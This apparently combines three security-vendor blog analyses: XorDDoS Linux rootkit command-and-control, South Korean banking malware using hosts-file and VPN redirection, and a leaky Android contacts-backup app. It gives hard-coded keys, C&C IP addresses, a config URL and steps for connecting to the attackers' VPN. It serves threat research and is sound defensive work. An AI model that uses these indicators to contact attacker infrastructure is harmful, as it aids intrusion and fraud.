Based on the procedure names, it is likely that the malware authors were inspired by the open source project called Suterusu to build up their rootkit. The Trojan from last year called Hand of Thief failed in its ambitions to be the first banking Trojan for Linux desktops.  It also borrowed part of its code from an existing open source project, namely methods of process injection. The description of the project says “An LKM rootkit targeting Linux 2.6/3.x on x86(_64), and ARM”. Another article related to Suterusu was published in January 2013.

C&C communication

The communication is encrypted in both directions with the same hard-coded XOR key (BB2FA36AAA9541F0) as the configuration file. An additional file /var/run/sftp.pid containing an unique magic string of length 32 bytes is stored and utilized as an unique identifier of a victim’s machine within the communication. There is a list of C&C commands, for which the bot listens to: To start flooding, to stop flooding, to download-and-execute, to self-update, to send the MD5 hash of its memory, and to get list of processes to kill:

elf_commands_jump_table

The list of C&Cs is stored in the shell script in the __remote__ variable. The Trojan first sends information about the running system to the C&C server (very likely to be displayed on a panel of a botnet operator). The replies usually arrived in a form of a command. The header of the command is 0x1C bytes long and is stored within a structure called Header. The first command is to stop any flooding attack and the next one to start one with the list of hosts provided. The entries of the Header are shown below. Highlighted parameters are the size of the total size of a command (Size, 0x102C), the task number (Order, 0×3, i.e. _cmd_start in the switch table), and the number of flooding tasks (Task_Num, 0xF):

elf_header_flood_from_c2

The rest of the flooding command contains an encrypted structure with attack tasks. After decryption, we can see an IP address (red color) and ports (green color) which will be flooded by the Trojan and other parameters of the DDoS attack (e.g. grey color decides the type of  attack:  SYN/DNS).

elf_command_victims

Acknowledgement

Thanks to my colleague, Jaromír Hořejší, for cooperation on this analysis. Pop-art was created by the independent digital artist Veronika Begánová.

Sources

Here are the samples connected with the analysis:

Install script BA84C056FB4541FE26CB0E10BC6A075585
990F3CE3CDE2B49475022AD5254E5B
BV:Xorddos-B [Trj]
Xorddos Uploader 44153031700A019E8F9E434107E4706A705
F032898D3A9819C4909B2AF634F18
ELF:Xorddos-J [Trj]
Xorddos Trojan for EM_386 AD26ABC8CD8770CA4ECC7ED20F37B510E
827E7521733ECAEB3981BF2E4A96FBF
ELF:Xorddos-A [Trj]
Xorddos Trojan for EM_x86_64 859A952FF05806C9E0652A9BA18D521E57
090D4E3ED3BEF07442E42CA1DF04B6
ELF:Xorddos-A [Trj]
Xorddos Rootkit 6BE322CD81EBC60CFEEAC2896B26EF015D
975AD3DDA95AE63C4C7A28B7809029
ELF:Xorddos-D [Rtk]
Xorddos Trojan for EM_ARM 49963D925701FE5C7797A728A044F09562
CA19EDD157733BC10A6EFD43356EA0
ELF:Xorddos-I [Trj]
Xorddos Trojan no rootkit 24B9DB26B4335FC7D8A230F04F49F87B1F
20D1E60C2FE6A12C70070BF8427AFF
ELF:Xorddos-K [Trj]

South Korea hit with banking malware using VPN connection

South Korean banks have been attacked by hackers again!

This is not the first time we reported malware which targets Korean banking customers. In the past, we wrote about Chinese threats against Korean Windows users and last year we published a series of blogposts, Fake Korean bank applications for Android (part 1, part 2, part 3), about malware targeting mobile platforms.

The Korean banking malware is based on the same principle previously used. The customer executes the infected binary, which modifies Windows hosts file. This file contains a list of domains with assigned IP addresses.  Malware, however, may modify this file. When a customer wants to visit his online bank website, he is redirected to the IP address specified in the hosts file, not to the original bank website!

XP Debugging2

The piece of malware we will discuss in this blog post performs the above mentioned modification of system settings. However, when we looked into the modified hosts file, we noticed something unusual.

hosts

As you can see in the figure above (shortened screenshot of hosts file), the malware redirects many websites of South Korean banks to the IP address 10.0.0.7. If you try to enter this address into your web browser, you probably won’t get any response, because this is the private IP address. The other websites which belong to South Korean search engines, like Naver, are redirected to the publicly accessible IP address. When visiting any of these search engines on the infected machine, the following banner is displayed on the top of the regular website.

popThe image says:

Do you have a security software or program in your PC or Do you have a security card? Due to hacking incidents and potential of compromising users’ information if you want to use internet banking you need to do identification procedure.

We found one very interesting technical detail about the malware behavior – it uses a VPN connection! When a user clicks on one of the bank’s logos below, he is connected to a VPN and the fake banking website is displayed. At first, the malware connects to the C&C server and obtains configuration by GET request on 69.30.240.106/index.txt. The C&C answer includes a link to an executable modifying the hosts file and VPN server IP address.

900
test.exe
vpn=204.12.226.98

The executable is responsible for properly rewriting %windows%system32driversetchost file, which is queried for address translation before querying DNS on Windows machines. For example, if you want to go to www.naver.com the system first accesses the host file, and if there is a match it uses the specified IP address (104.203.169.221) for that site which differs from the original DNS records – 202.131.30.12 for our geographical location.

The malware targets Korean bank customers who access the following bank websites:

www.nonghyup.com, nonghyup.com, banking.nonghyup.com, www.nonghyup.co.kr, nonghyup.co.kr, banking.nonghyup.co.kr, www.shinhan.com, shinhan.com, www.shinhanbank.com, shinhanbank.com, www.shinhanbank.co.kr, shinhanbank.co.kr, banking.shinhanbank.com, banking.shinhan.com, banking.shinhanbank.co.kr, www.hanabank.com, hanabank.com, www.hanabank.co.kr, hanabank.co.kr, www.wooribank.com, wooribank.com, www.wooribank.kr, wooribank.kr, www.wooribank.co.kr, wooribank.co.kr, www.kbstar.com, kbstar.com, www.kbstar.co.kr, kbstar.co.kr, www.keb.co.kr, keb.co.kr, ebank.keb.co.kr, online.keb.co.kr, www.ibk.co.kr, ibk.co.kr, www.ibk.kr, ibk.kr, mybank.ibk.co.kr, banking.ibk.co.kr, www.kfcc.co.kr, kfcc.co.kr, www.kfcc.com, kfcc.com, www.epostbank.co.kr, epostbank.co.kr, www.epost.kr, epost.kr, www.epostbank.kr, epostbank.kr

The bank domain names are translated into a private network address range (10.0.0.7) and the search engines are translated to webserver running IIS. Webserver runs a Chinese version of IIS, as shown from the error message displayed when supplying incorrect header information.

iis
The malware, however, is not connected to the VPN all the time. The malware searches for the active Internet Explorer windows and if found, depending on Internet Explorer version, it locates browser’s address bar and extracts the currently entered url address. If URL belonging to any of the banks is found, VPN connection is established.

At first, malware drops a file %USERPROFILE%profiles.pbk, which includes the basic configuration. The credentials for VPN (name and password) are hard coded in the binary. The connection is made with help of Windows RAS API interface.

rasdial

If we want to verify the VPN connection in Windows, we can simply locate the dropped PBK file and double click on it. In properties, we will choose “Prompt for name and passwords, certificate, etc.” We enter the username and password, which we previously extracted from the malicious binary. After pressing the “Connect” button, we are connected to the VPN, and if hosts file is properly modified, we can access the fake bank websites. After pressing “Hang Up”, we can disconnect from VPN.

pbk01

pbk02

pbk03

pbk04

 

After a successful connection, “ipconfig /all” command lists PPP connection to VPN, with the current machine’s assigned private IP address. At this moment, the infected machine is connected into the private network and it can access contents hosted on 10.0.0.7.

vpn

Example of visiting bank’s website on a compromised computer

When a customer visits nate, daum or naver on an infected machine, he is presented with the following banner.
XP Debugging1

After clicking on the logo of a bank, the customer is presented with the following modified website (the example below was taken for epostbank.kr, however this attack works the same way for the other banks). If the customer clicks on any link on the fake bank website, he is presented with an error message. The message says that the additional security measures are available. After clicking OK, the fake verification process starts.
epostbank_errormsg
The customer is asked to fill in some personal details.
epostbank01
Then he is asked for a phone number and numbers in his security card.
epostbank02
Lastly, he is presented with a link to download a malicious Android application. At the writing of this blog post, the link to the malicious Android app is not working anymore.
epostbank03

SHAs:

Original dropper

1C22460BAFDDBFDC5521DC1838E2B0719E34F258C2860282CD48DF1FBAF76E79

Dropped DLL, C&C communication

FDF4CAA13129BCEF76B9E18D713C3829CF3E76F14FAE019C2C91810A84E2D878

Hosts file modifier

1D1AE6340D9FAB3A93864B1A74D9980A8287423AAAE47D086CA002EA0DFA4FD4

 

Acknowledgements:

This analysis was jointly accomplished by Jaromir Horejsi, David Fiser and Honza Zika.

Is backing up your data the same as exposing it? In this case – Yes!

Losing contacts from your mobile phone is highly inconvenient. There’s seems to be a solution –  You can find them online! The catch? Your contacts are in a publicly accessible place.

1playstore photo

Seriously.

If you care for your privacy you should always be suspicious about “Cloud Backup” solutions you find in the Google Play Store. The solution that is being analyzed here backs up your personal contacts online. In public.

Upon starting the application, you will find a screen where you can put your mobile number and a password of your choice. Then you can upload your contacts in the cloud.

 2app

A brief analysis inside this application shows us how exactly it backs up your contacts in the cloud. The contacts are associated with the phone number that you have given in the previous step and they are sent through HTTP POST requests in a PHP page.

3savedatacloud

Further analysis through IP traffic capturing with Fiddler helped usdiscover the results in the pictures above; a page located online, for anyone to see, that contains thousands of un-encrypted entries of phone numbers and passwords. Using the info in the app you can retrieve personal private data (contacts) from another user.

4fiddlerinfo 5datafromserver

We found log in data inside those entries from countries like Greece, Brazil, and others

The Play Store page says that this app has been installed 50.000-100.000 times. This is a big number of installations for an application that doesn’t deliver the basic secure Android coding practices. The developer must use technologies like HTTPS, SSL and encryption on the data that are transferred through the web and stored in the server. Nogotofail is a useful network security testing tool designed by Google to “to help developers and security researchers spot and fix weak TLS/SSL connections and sensitive cleartext traffic on devices and applications in a flexible, scalable, powerful way.

6appinfoplaystore The application has been reported to Google without receiving any response.

Avast detects it as Android:DataExposed-B [PUP].

Samples (SHA-256):

F51803FD98C727F93E502C13C9A5FD759031CD2A5B5EF8FE71211A0AE7DEC78C 199DD6F3B452247FBCC7B467CB88C6B0486194BD3BA01586355BC32EFFE37FAB